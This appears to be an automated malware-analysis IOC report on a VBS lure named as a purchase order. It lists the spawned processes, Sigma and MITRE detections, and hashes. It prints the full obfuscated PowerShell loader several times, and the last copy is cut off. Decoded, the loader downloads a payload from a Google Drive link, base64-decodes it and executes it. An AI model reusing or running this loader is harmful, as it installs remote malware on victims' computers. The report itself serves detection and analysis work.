Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	2464
Target ID:	0
Parent PID:	1028
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	08:04:51
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7561c0000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Invoke-Obfuscation CLIP+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation VAR+ Launcher	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"

Details

Is windows:	true
Is dropped:	false
PID:	3012
Target ID:	2
Parent PID:	2464
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	08:04:51
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7be880000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Invoke-Obfuscation CLIP+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation VAR+ Launcher	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in 